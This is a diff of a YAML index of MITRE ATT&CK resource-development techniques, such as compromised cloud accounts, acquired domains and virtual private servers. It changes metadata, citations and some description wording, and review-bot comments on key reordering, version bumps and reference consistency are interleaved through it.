+ Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Francesco Bigarella
+ x_mitre_deprecated: false
x_mitre_detection: 'Much of this activity will take place outside the visibility
of the target organization, making detection of this behavior difficult. Detection
efforts may be focused on related stages of the adversary lifecycle, such
as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Francesco Bigarella
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
created: '2022-05-27T14:30:01.904Z'
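Review bot: most of this hunk is key reordering (`x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_is_subtechnique`, `x_mitre_platforms` and `x_mitre_version` move position with unchanged values), which buries the two substantive edits: the description gains the sentence on cloud messaging services (Twilio, SendGrid, AWS End User Messaging, SNS, SES) with two new citation keys, and `x_mitre_version` goes from 1.0 to 1.1. Consider having the index generator emit keys in a stable order so that regenerations diff only on content. The version bump is consistent with the description change; the new citation keys `Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022` and `Netcraft SendGrid 2024` must have matching `external_references` entries on this object, which the following hunk supplies.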
@@ -63940,10 +64603,19 @@ resource-development:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1586/003
external_id: T1586.003
+ - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+ description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+ Case Studies From the Wild. Retrieved March 9, 2023.'
+ url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
- source_name: Awake Security C2 Cloud
description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
Command & Control in the Cloud. Retrieved May 27, 2022.'
url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+ - source_name: Netcraft SendGrid 2024
+ description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+ is abused to host phishing attacks impersonating itself. Retrieved October
+ 15, 2024.
+ url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
- source_name: MSTIC Nobelium Oct 2021
description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
targeting delegated administrative privileges to facilitate broader attacks.
@@ -63951,9 +64623,8 @@ resource-development:
url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586.002:
technique:
@@ -64004,11 +64675,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.001:
technique:
- modified: '2023-04-11T23:22:49.534Z'
+ modified: '2024-10-16T20:13:40.501Z'
name: Upload Malware
description: |-
Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -64021,7 +64691,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Kobi Haimovich, CardinalOps
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
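Review bot: the contributor rename from `Goldstein Menachem` to `Menachem Goldstein` is correct but is repeated independently in the T1584 and T1608.005 hunks below; grep the whole index for any remaining `Goldstein Menachem` so the same contributor does not appear under two spellings in any derived contributor listing.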
@@ -64056,22 +64726,25 @@ resource-development:
url: https://blog.talosintelligence.com/ipfs-abuse/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.001:
technique:
- modified: '2024-04-13T14:03:04.511Z'
+ modified: '2024-09-25T15:26:00.047Z'
name: Domains
description: |-
Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
- Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+ Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+ Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+ In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
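Review bot: the new Route53 paragraph introduces `(Citation: Invictus IR DangerDev 2024)`, which only resolves if an `external_references` entry with exactly that `source_name` exists on the same object; that entry is added in a later hunk of this file, so the two hunks must not be split or partially reverted. The other text change in this hunk, splitting the "Different URIs/URLs" sentence into its own paragraph and inserting "(including one-time, single use domain names)", is a content edit, and the 1.3 to 1.4 `x_mitre_version` bump in the next hunk correctly reflects it.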
@@ -64092,7 +64765,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -64131,6 +64804,10 @@ resource-development:
description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
OPERATIONS?. Retrieved August 19, 2015.'
url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+ - source_name: Invictus IR DangerDev 2024
+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
- source_name: Domain_Steal_CC
description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -64186,7 +64863,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.002:
technique:
@@ -64244,7 +64920,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.004:
technique:
@@ -64324,7 +64999,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.002:
technique:
@@ -64384,7 +65058,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.001:
technique:
@@ -64406,7 +65079,7 @@ resource-development:
description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
SunshopFireEye. Retrieved March 6, 2017.'
url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:15:52.805Z'
name: Malware
description: |-
Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
@@ -64425,42 +65098,10 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- 'Malware Repository: Malware Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
- type: attack-pattern
- created: '2020-10-01T00:44:23.935Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1583.003
- url: https://attack.mitre.org/techniques/T1583/003
- - source_name: TrendmicroHideoutsLease
- description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
- Bulletproof Hosting Services. Retrieved March 6, 2017.'
- url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
- - source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
- description: 'ThreatConnect. (2020, December 15). Infrastructure Research
- and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- - source_name: Mandiant SCANdalous Jul 2020
- url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
- description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
- Using Network Scan Data and Automation). Retrieved October 12, 2021.
- - source_name: Koczwara Beacon Hunting Sep 2021
- url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
- description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
- Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:22:11.113Z'
name: Virtual Private Server
description: |-
Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
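Review bot: the entire leading block of T1583.003 (`x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and all four `external_references` entries) is deleted here and re-added in a different key order in the next hunk, so nothing is actually lost, but a delete/re-add of this size for what is a reorder plus `revoked: false` and `x_mitre_deprecated: false` is hard to review and the same pattern recurs for T1588.002 below. If the generator cannot produce a stable key order, the PR description should at least call these out as reorders rather than removals. The `modified` jump from 2022-04-25 to 2024-10-15 at the end of the hunk is the only value change.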
@@ -64469,22 +65110,53 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+ created: '2020-10-01T00:44:23.935Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1583/003
+ external_id: T1583.003
+ - source_name: Koczwara Beacon Hunting Sep 2021
+ description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+ Shodan. Retrieved October 12, 2021.
+ url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+ - source_name: TrendmicroHideoutsLease
+ description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+ Bulletproof Hosting Services. Retrieved March 6, 2017.'
+ url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+ - source_name: Mandiant SCANdalous Jul 2020
+ description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+ Using Network Scan Data and Automation). Retrieved October 12, 2021.
+ url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+ - source_name: ThreatConnect Infrastructure Dec 2020
+ description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+ and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584:
technique:
- modified: '2024-03-28T03:53:28.299Z'
+ modified: '2024-10-16T20:06:03.570Z'
name: Compromise Infrastructure
description: |-
Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
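Review bot: `x_mitre_version` stays at '1.1' for T1583.003 while `x_mitre_attack_spec_version` goes from 2.1.0 to 3.2.0 and `modified` advances to 2024-10-15, which is consistent with a spec-only update and no change to the technique text; the three citations in the unchanged `x_mitre_detection` block (`ThreatConnect Infrastructure Dec 2020`, `Mandiant SCANdalous Jul 2020`, `Koczwara Beacon Hunting Sep 2021`) all still have matching entries in the re-added `external_references` list. Note that this hunk also carries the `modified` change for the next object, T1584, so a revert of the T1583.003 reorder would need to preserve that line.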
@@ -64498,7 +65170,7 @@ resource-development:
x_mitre_contributors:
- Jeremy Galloway
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
information and/or domain resolution information that may indicate the compromise
@@ -64585,11 +65257,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T01:08:56.774Z'
name: Compromise Accounts
description: "Adversaries may compromise accounts with services that can be
used during targeting. For operations incorporating social engineering, the
@@ -64649,7 +65320,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.005:
technique:
@@ -64691,7 +65361,7 @@ resource-development:
servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
or Distributed Denial of Service (DDoS).'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T15:55:58.319Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Botnet
x_mitre_detection: Much of this activity will take place outside the visibility
@@ -64706,7 +65376,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608:
technique:
@@ -64797,11 +65466,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.005:
technique:
- modified: '2024-04-13T14:03:24.673Z'
+ modified: '2024-10-16T20:09:41.391Z'
name: Link Target
description: "Adversaries may put in place resources that are referenced by
a link that can be used during targeting. An adversary may rely upon a user
@@ -64834,15 +65502,16 @@ resource-development:
to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
In addition, adversaries may serve a variety of malicious links through uniquely
- generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
- Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
- decentralized nature of the InterPlanetary File System (IPFS) to host link
- targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+ generated URIs/URLs (including one-time, single use links).(Citation: iOS
+ URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+ adversaries may take advantage of the decentralized nature of the InterPlanetary
+ File System (IPFS) to host link targets that are difficult to remove.(Citation:
+ Talos IPFS 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Hen Porcilan
- Diyar Saadi Ali
- Nikola Kovac
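Review bot: the only wording change in the rewrapped `description` is the inserted phrase "(including one-time, single use links)"; the rest of the churn is line folding of the double-quoted scalar, and because YAML folds a line break inside a double-quoted scalar to a single space, `(Citation: iOS` / `URL Scheme)` being split across lines still yields the key `iOS URL Scheme`, as the old text already did for `URI Use`. Since this is a content edit to T1608.005, check that its `x_mitre_version` is bumped in the part of the object not shown in this hunk, matching how T1586.003 and T1583.001 were handled above.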
@@ -64926,7 +65595,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.006:
technique:
@@ -64980,7 +65648,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.003:
technique:
@@ -65031,36 +65698,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - SOCCRATES
- - Mnemonic AS
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
- type: attack-pattern
- created: '2020-10-01T02:08:33.977Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.002
- url: https://attack.mitre.org/techniques/T1588/002
- - source_name: Recorded Future Beacon 2019
- url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
- description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
- Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- modified: '2021-10-17T16:17:55.499Z'
+ modified: '2024-09-16T16:20:16.431Z'
name: Tool
description: |-
Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -65069,21 +65710,47 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - SOCCRATES
+ - Mnemonic AS
+ x_mitre_deprecated: false
x_mitre_detection: |-
In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+ created: '2020-10-01T02:08:33.977Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/002
+ external_id: T1588.002
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: Recorded Future Beacon 2019
+ description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+ Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584.006:
technique:
- modified: '2023-04-12T20:19:21.620Z'
+ modified: '2024-10-15T16:44:09.114Z'
name: Web Services
description: 'Adversaries may compromise access to third-party web services that
can be used during targeting. A variety of popular websites exist for legitimate
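Review bot: the Recorded Future reference for T1588.002 changes its URL from `https://www.recordedfuture.com/identifying-cobalt-strike-servers/` to `https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers` and updates the Retrieved date to September 16, 2024 while leaving the citation text unchanged, which is the right way to record a moved page; the Turla reference in the next hunk gets the same treatment, and in both cases the `source_name` is unchanged so existing `(Citation: ...)` markers keep resolving. The remainder of this hunk is the re-add of the T1588.002 fields deleted in the previous hunk plus `revoked: false` and `x_mitre_deprecated: false`; `x_mitre_version` stays at 1.1, consistent with no change to the technique text.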
@@ -65129,17 +65796,16 @@ resource-development:
external_id: T1584.006
- source_name: Recorded Future Turla Infra 2020
description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
- Tracking Turla Infrastructure. Retrieved October 20, 2020.'
- url: https://www.recordedfuture.com/turla-apt-infrastructure/
+ Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/research/turla-apt-infrastructure
- source_name: ThreatConnect Infrastructure Dec 2020
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
url: https://threatconnect.com/blog/infrastructure-research-hunting/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.001:
technique:
@@ -65165,7 +65831,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:37:34.563Z'
name: Social Media Accounts
description: "Adversaries may create and cultivate social media accounts that
can be used during targeting. Adversaries can create social media accounts
@@ -65197,8 +65863,6 @@ resource-development:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Persona: Social Media'
- spec_version: '2.1'
